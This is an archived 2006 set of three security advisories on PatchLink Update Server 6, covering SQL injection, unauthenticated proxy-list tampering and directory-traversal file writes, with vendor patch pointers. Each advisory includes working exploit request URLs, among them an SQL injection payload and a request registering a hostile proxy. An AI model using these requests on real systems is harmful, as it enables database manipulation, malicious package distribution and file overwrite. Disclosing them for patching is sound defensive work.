patchlink6.txt

2006-07-02T00:00:00
ID PACKETSTORM:47908
Type packetstorm
Reporter Chris Steipp
Modified 2006-07-02T00:00:00

Description

                                        
                                            `  
-------------------------------------------------------------  
PatchLink Update Server 6 SQL Injection  
-------------------------------------------------------------  
Severity: Critical  
Date: June 28, 2006  
Class: Remote  
Status: Patch Available  
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)  
-------------------------------------------------------------  
  
Synopsis  
=====  
Novacoast has discovered a vulnerability in the PatchLink Update  
Server  
(PLUS). This could allow the attacker to execute sql statements in the  
PatchLink database as DBO.  
  
Background  
======  
  
PatchLink Update* is the core product of the leading patch and  
vulnerability  
management solution for medium and large enterprise networks.  
  
Discussion  
======  
  
There is an SQL injection vulnerability in the checkprofile.asp script.  
This  
unauthenticated script uses posted variables in an SQL call, which can  
be  
exploited.  
  
An unchecked, posted variable (agentid) is used to create an SQL  
statement.  
The statement is run as “PLUS ANONYMOUS” (who is a member of PLUS  
ADMINS, and  
the PLUS ADMINS group is dbo on the PLUS database) was the inserting  
user.  
Thus the database can be manipulated as DBO via this attack.  
  
Affected Version  
=========  
  
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1  
Novell ZENworks Patch Management 6.2. SR1  
  
Exploit  
====  
  
None required.  
  
The example exploit given here will write the string “something”  
into the  
ReportErrors table:  
  
  
http://plus.company.org/dagent/checkprofile.asp?agentid=11111';%20INSERT  
%20INTO%20ReportErrors%20(ReportError_Description)%20VALUES%20  
('something')--  
  
Recommended Solution  
=============  
  
Apply Vendor Patch  
PatchLink:  
PatchLink Update Server (PLUS) for 6.2 SR1 P1  
PatchLink Update Server (PLUS) for 6.1 P1  
Novell:   
  
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm  
  
Disclaimer  
======  
Novacoast accepts no liability or responsibility for the  
content of this report, or for the consequences of any  
actions taken on the basis of the information provided  
within. Dissemination of this information is granted  
provided it is presented in its entirety. Modifications  
may not be made without the explicit permission of  
Novacoast.  
  
  
  
  
-------------------------------------------------------------  
PatchLink Update Server 6 PDP Anonymous Access  
-------------------------------------------------------------  
Severity: Medium  
Date: June 28, 2006  
Class: Remote  
Status: Patch Available  
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)  
-------------------------------------------------------------  
  
Synopsis  
=====  
  
Novacoast has discovered a vulnerability in the PatchLink Update  
Server  
(PLUS) Distribution Point Server Listing for PatchLink's FastPatch  
application. Exploitation of this vulnerability could allow the  
attacker to  
proxy requests by PatchLink Update Agents for patches, and thus  
possibly  
inject arbitrary packages into the PatchLink environment.  
  
Background  
======  
  
PatchLink Update* is the core product of the leading patch and  
vulnerability  
management solution for medium and large enterprise networks.  
  
PatchLink Distribution Point and FastPatch technology provide  
intelligent  
distribution across the entire enterprise minimizing deployment speeds  
and  
bandwidth utilization across the wide area network.  
  
Discussion  
======  
  
The asp page “proxyreg.asp” does not properly authenticate  
credentials when  
accessed. The “proxyreg.asp” page appears to be used by the  
PatchLink  
FastPatch software, which allows roaming PatchLink agents to identify  
proxy  
servers on their network and connect to the closest or fastest  
PatchLink  
Distribution Point (PDP) automatically. The asp page returns a list of  
PDP  
servers in the organizations environment. An unauthenticated user can  
list,  
add, and remove PDP servers from this list.  
  
This vulnerability would only affect organizations that use the  
FastPatch  
add-on product. Organizations that use SSL to protect their  
agent-to-PLUS  
communication will be unaffected by this attack.  
  
Affected Version  
=========  
  
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1  
Novell ZENworks Patch Management 6.2. SR1  
  
Exploit  
====  
  
None required.  
  
1) To list all Proxy servers use:  
  
http://plus.company.org/dagent/proxyreg.asp?List=  
  
Use username/password of null/null for authentication.  
  
2) To add a new Proxy server, use:  
  
http://plus.company.org/dagent/proxyreg.asp?Proxy=www.hostileproxy.com:1337  
  
3) To delete a Proxy server, use:  
  
http://plus.company.org/dagent/proxyreg.asp?Delete=pdp1.company.org  
  
  
Recommended Solution  
=============  
  
1) Apply Vendor Patch  
PatchLink:  
PatchLink Update Server (PLUS) for 6.2 SR1 P1  
PatchLink Update Server (PLUS) for 6.1 P1  
Novell:   
  
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm  
  
2) Workaround  
Deploy SSL certificate authentication to secure traffic between  
agents  
and PLUS.  
  
  
Disclaimer  
======  
Novacoast accepts no liability or responsibility for the  
content of this report, or for the consequences of any  
actions taken on the basis of the information provided  
within. Dissemination of this information is granted  
provided it is presented in its entirety. Modifications  
may not be made without the explicit permission of  
Novacoast.  
  
  
  
  
-------------------------------------------------------------  
PatchLink Update Server 6 File Overwrite  
-------------------------------------------------------------  
Severity: Medium  
Date: June 28, 2006  
Class: Remote  
Status: Patch Available  
Discovered by: Chris Steipp, Novacoast (csteipp at novacoast dot com)  
-------------------------------------------------------------  
  
Synopsis  
=====  
Novacoast has discovered a vulnerability in the PatchLink Update  
Server  
(PLUS). This could allow the attacker to write or overwrite files on  
the  
PLUS filesystem.  
  
Background  
======  
  
PatchLink Update* is the core product of the leading patch and  
vulnerability  
management solution for medium and large enterprise networks.   
  
Discussion  
======  
  
The application “nwupload.asp” allows unauthenticated connections,  
and  
performs file writes for the requester as the user “PLUS ANONYMOUS”  
(who is  
a member of "PLUS ADMINS" Windows group by default). No validation  
checks  
are performed to prevent directory traversal.  
  
The application nwupload.asp writes a file into directories defined by  
variables passed to the page, appended to a registry key value. By  
default,  
on a Windows 2003 server, the registry key points to:  
“C:\Program Files\Patchlink\Update Server\Storage”. Since  
directory  
traversals are not checked for, it is possible to write to any folder  
on the  
PLUS that PLUS ANONYMOUS (or thus, the PLUS ADMINS group) has access  
to.  
  
Affected Version  
=========  
  
PatchLink Update Server 6.2.0.189, 6.2.0.181, 6.1  
Novell ZENworks Patch Management 6.2. SR1  
  
Exploit  
====  
  
None required.  
  
1) An attacker can run:  
  
http://plus.company.org/dagent/nwupload.asp?action=one&agentid=two&data=  
thisiscool&index=1  
  
This will first delete the folder at:  
{regkey for storage directory}\one\two  
  
then create the directory:  
{regkey for storage directory}\one\two  
  
then write the file:  
{regkey for storage directory}\one\two\1.txt  
  
The file 1.txt will have the contents of the "data" variable.  
  
Recommended Solution  
=============  
  
Apply Vendor Patch  
PatchLink:  
PatchLink Update Server (PLUS) for 6.2 SR1 P1  
PatchLink Update Server (PLUS) for 6.1 P1  
Novell:   
  
http://support.novell.com/cgi-bin/search/searchtid.cgi?10100709.htm  
  
Disclaimer  
======  
Novacoast accepts no liability or responsibility for the  
content of this report, or for the consequences of any  
actions taken on the basis of the information provided  
within. Dissemination of this information is granted  
provided it is presented in its entirety. Modifications  
may not be made without the explicit permission of  
Novacoast.  
  
`